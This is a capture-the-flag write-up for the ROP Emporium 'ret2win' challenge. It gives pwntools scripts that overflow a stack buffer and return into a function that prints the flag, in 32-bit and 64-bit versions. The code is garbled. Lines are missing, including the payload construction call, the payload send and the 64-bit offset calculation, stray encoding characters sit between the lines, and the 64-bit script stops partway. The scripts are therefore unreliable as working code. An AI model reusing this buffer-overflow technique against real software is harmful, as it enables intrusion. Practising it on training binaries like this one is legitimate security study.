ROP Emporium

# ret2win (32-bit)

## Solution

Typical ret2text. There is an unused function `ret2win` located in the `.text` segment that calls `system("/bin/cat flag.txt")` for us. This is sometimes called "dead code".

## Exploit

1
#!/usr/bin/env python3
2
from pwn import *
3
â€‹
4
#--------Setup--------#
5
â€‹
6
context(arch="i386", os="linux")
7
elf = ELF("ret2win32", checksec=False)
8
â€‹
9
#--------Offset--------#
10
â€‹
11
p = elf.process()
12
pattern = cyclic(1024)
13
p.sendlineafter("> ", pattern)
14
p.wait()
15
core = p.corefile
16
p.close()
17
os.remove(core.file.name)
18
offset = cyclic_find(core.eip)
19
â€‹
20
log.info(f"{offset = }")
21
â€‹
22
#--------ret2text--------#
23
â€‹
24
ret2win = elf.sym["ret2win"]
25
â€‹
26
27
b"A" * offset,
28
ret2win,
29
)
30
â€‹
31
p = elf.process()
32
â€‹
33
34
â€‹
35
p.interactive()
Copied!

## 64bit

### Solution

The idea is essentially the same as the 32bit case.

### Exploit

1
#!/usr/bin/env python3
2
from pwn import *
3
â€‹
4
#--------Setup--------#
5
â€‹
6
context(arch="amd64", os="linux")
7
elf = ELF("ret2win", checksec=False)
8
â€‹
9
#-------Offset--------#
10
â€‹
11
p = elf.process()
12
pattern = cyclic(1024)
13
p.sendlineafter("> ", pattern)
14
p.wait()
15
core = p.corefile
16
p.close()
17
os.remove(core.file.name)
18
19
â€‹
20
log.info(f"{offset = }")
21
â€‹
22
#--------ret2text--------#
23
â€‹
24
ret2win = elf.sym["ret2win"]
25
â€‹
26
27
b"A" * offset,
28
ret2win,
29
)
30
â€‹
31
p = elf.process()
32
â€‹
33